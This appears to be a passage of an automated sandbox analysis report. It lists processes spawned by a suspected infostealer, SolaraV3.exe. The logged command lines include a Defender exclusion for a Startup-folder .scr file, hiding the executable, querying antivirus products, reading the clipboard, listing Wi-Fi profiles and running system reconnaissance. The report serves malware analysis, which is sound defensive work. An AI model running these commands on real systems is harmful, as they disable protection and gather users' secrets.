                                                                                                                                                                                                                            Start time:09:32:22
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                            Start time:09:32:22
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                            Imagebase:0x7ff768620000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                            Start time:09:32:22
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                            Start time:09:32:22
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                            Start time:09:32:23
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                            Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                            Start time:09:32:23
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff6da5b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                            Start time:09:32:25
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                            Start time:09:32:25
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                            Start time:09:32:26
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff6da5b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                            Start time:09:32:27
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                            Start time:09:32:27
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                            Start time:09:32:27
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                            Start time:09:32:27
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                            Start time:09:32:27
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff62c010000
                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                            Start time:09:32:27
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
                                                                                                                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                            Start time:09:32:28
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                            Start time:09:32:28
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                            Start time:09:32:28
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                            Start time:09:32:28
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                            Start time:09:32:28
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                            Start time:09:32:28
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                            Start time:09:32:29
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff623ef0000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                            Start time:09:32:29
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff623ef0000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                            Start time:09:32:29
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                            Imagebase:0x7ff6da5b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                            Start time:09:32:30
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                            Start time:09:32:30
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                            Start time:09:32:30
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                            Start time:09:32:31
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                            Start time:09:32:31
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                            Start time:09:32:31
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                            Start time:09:32:31
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                            Start time:09:32:31
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff76da80000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:59
                                                                                                                                                                                                                            Start time:09:32:31
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff623ef0000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:60
                                                                                                                                                                                                                            Start time:09:32:32
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:61
                                                                                                                                                                                                                            Start time:09:32:32
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:62
                                                                                                                                                                                                                            Start time:09:32:32
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
